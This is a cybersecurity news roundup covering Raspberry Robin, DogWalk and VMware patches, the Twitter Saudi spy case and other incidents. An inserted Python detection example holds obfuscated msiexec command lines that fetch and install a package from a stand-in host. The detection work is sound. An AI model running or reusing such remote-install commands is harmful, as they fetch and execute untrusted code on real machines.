Cyber Security Headlines: Chinese kids defrauded, Twitter Saudi spy, Facebook abortion court order

Chinese fraudsters target kids playing online games

Chinese scammers are targeting children playing online games with fraudulent promises, including circumventing the nation’s 3-hour-per-week gaming limit. The fraudsters are friending victims using messaging platforms such as WeChat, then soliciting payments in exchange for extra gaming time, free gaming skins and free gaming equipment. China’s cyberspace administration (CAC) detailed cases highlighting that victims typically used their parents’ phones to make payments ranging from $560 to as much as $1,850. The CAC disclosed that, so far this year, it has handled 12,000 acts of online fraud perpetrated against minors.

(The Register)

Former Twitter employee convicted in Saudi spy case

On Tuesday, a former Twitter employee was convicted of spying for Saudi Arabia. Ahmad Abouammo, a US resident born in Egypt, maintained that he was simply promoting the social media platform in the Middle East and North Africa. However, the jury was shown that Abouammo received a Hublot watch and $300,000 in wire transfers in exchange for confidential Twitter account information on Saudi dissidents who criticized the Kingdom and its royal family. The bribes came from a top aide to Mohammed bin Salman, now the de facto ruler of Saudi Arabia. Abouammo was found guilty of acting as an agent for Saudi Arabia, money laundering, conspiracy to commit wire fraud and falsifying records. He now faces 10 to 20 years in prison.

(Bloomberg)

Facebook divulges data leading to abortion prosecution

A 17-year-old girl and her mother have been charged with a series of felonies and misdemeanors after an apparent at-home abortion in Nebraska. The state’s case leveraged the teenager’s private Facebook messages, obtained directly from Facebook by court order. The messages allegedly show the mother and daughter purchased medication called Pregnot online to induce the abortion. Jessica Burgess was charged with three felonies, including performing an abortion later than the state’s 20-week post-fertilization abortion ban, which remains unchanged after the controversial reversal of Roe versus Wade. Both women were arrested and held on a $10,000 bond, but jail records indicate they’ve been released.

(VICE)

New Jersey requires threat assessment teams for all school districts

According to a newly signed law, New Jersey school districts, charter schools and renaissance schools will need to establish threat assessment teams in time for the 2023/2024 school year. Threat assessment teams will help teachers, administrators, and other staff identify students at risk of engaging in violence or other harmful activities, and will deliver risk management strategies. The teams will include a school psychologist or other student counselor, a teacher, a senior administrator, and a safety resource who will serve as a liaison to law enforcement. State officials highlight that the aim is to focus on preventative measures to keep dangerous incidents from occurring.

(Security Magazine)

Highly evasive worm spreads over external disks

Cisco researchers have uncovered a pattern of msiexec.exe usage across different endpoints that they’ve traced back to recently discovered malware called Raspberry Robin. Raspberry Robin is a worm that spreads through infected external drives and avoids string-matching techniques by using an excessive number of non-printable characters and by varying letter case. The payload is downloaded from QNAP cloud accounts and then establishes a command and control (C2) channel through Tor connections. Cisco researchers recommend monitoring for Indicators of Compromise (IOCs), which they have published in their blog.

(Cisco)
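
The evasion described above defeats literal string matching, so a detection has to normalize a command line before comparing it. The following is an added example, not Cisco's detection logic and not part of the original show notes: the sample command lines are constructed, the function names are hypothetical, and treating "msiexec given an http(s) URL" as the pattern of interest is an assumption drawn from the summary.

```python
import re
import unicodedata

# After normalization: msiexec (bare, with .exe, or path-prefixed) followed by an http(s) URL.
MSIEXEC_REMOTE = re.compile(r"""(?:^|[\\/\s"'])msiexec(?:\.exe)?\b.*?\bhttps?://\S+""")


def normalize(cmdline: str) -> str:
    """Remove non-printable characters and fold case so string matching holds."""
    kept = []
    for ch in cmdline:
        if ch in "\t\r\n":
            kept.append(" ")  # keep token boundaries intact
        elif unicodedata.category(ch).startswith("C"):
            continue  # control, format (zero-width), private-use, unassigned
        else:
            kept.append(ch)
    # NFKC maps compatibility forms (full-width letters, no-break space) to plain ones.
    text = unicodedata.normalize("NFKC", "".join(kept)).casefold()
    return re.sub(r"\s+", " ", text).strip()


def naive_hit(cmdline: str) -> bool:
    """The literal match that the obfuscation is designed to slip past."""
    return "msiexec" in cmdline


def flags_remote_msiexec(cmdline: str) -> bool:
    """True when the normalized command line is msiexec pointed at a remote URL."""
    return bool(MSIEXEC_REMOTE.search(normalize(cmdline)))


# Constructed sample command lines (not real IOCs).
SAMPLES = [
    "mS\u200biEx\x07Ec  /q\t/I  hTtP://storage.example.invalid:8080/pkg",
    'C:\\WINDOWS\\system32\\MsIeXeC.exe /Q /i "HTTP://storage.example.invalid/a"',
    "msiexec.exe /i C:\\Installers\\agent.msi /qn",  # local install, benign
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(naive_hit(line), flags_remote_msiexec(line), repr(normalize(line)))
```

The first constructed sample is missed by the literal match and caught after normalization; the local install is not flagged.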

You should probably patch that

Microsoft’s August 2022 Patch Tuesday includes fixes for the actively exploited ‘DogWalk’ zero-day vulnerability, tracked as CVE-2022-34713. It’s a flaw in Microsoft Windows Support Diagnostic Tool (MSDT) allowing for remote code execution (RCE). Yesterday’s update addresses a total of 121 flaws, seventeen of which are classified as ‘Critical’ as they allow remote code execution or elevation of privileges.

Additionally, VMware has issued a fix to address a critical authentication bypass vulnerability that has publicly available exploit code. The bug, tagged as CVE-2022-31656, affects VMware Workspace ONE Access, Identity Manager, and vRealize Automation.

(Bleeping Computer)

Danish Slurpee supply threatened by cyberattack

On Monday, 7-Eleven stores in Denmark were forced to shut down after a cyberattack disrupted store payment and checkout systems throughout the country. The company issued a statement on Facebook, which read, “Unfortunately, we suspect that we have been exposed to a hacker attack today, Monday 8 August 2022. This means that we cannot use checkouts and/or receive payment. We are therefore keeping the stores closed until we know the extent.” The nature of the attack has not yet been disclosed, but we can only hope that Danes are not deprived of brain freeze for too much longer.

(IT Security Guru)

Scientists use ink to hide encrypted version of classic novel

Scientists from the University of Texas at Austin sent a ground-breaking letter to colleagues in Massachusetts. The letter was penned in special ink which concealed a very special hidden message: an encrypted text file of L. Frank Baum’s classic novel The Wonderful Wizard of Oz, as well as a copy of the key to decrypt it. The ink was laced with synthetic polymers which the scientists used to store the data. DNA has long been considered a front-runner for storage because a single gram can store 1 billion terabytes (1 zettabyte) of data. However, scientists have sought a non-biological alternative. Co-author of UT’s research, Eric Anslyn, said the breakthrough represents “a revolutionary scientific advance in the area of molecular data storage and cryptography.”

(Ars Technica)

Sean Kelly
Sean Kelly is a cyber risk professional and leader who thrives on learning, collaborating and helping the business securely advance its mission. Sean is also a musician and outdoor enthusiast who loves spending time with his family and two cats.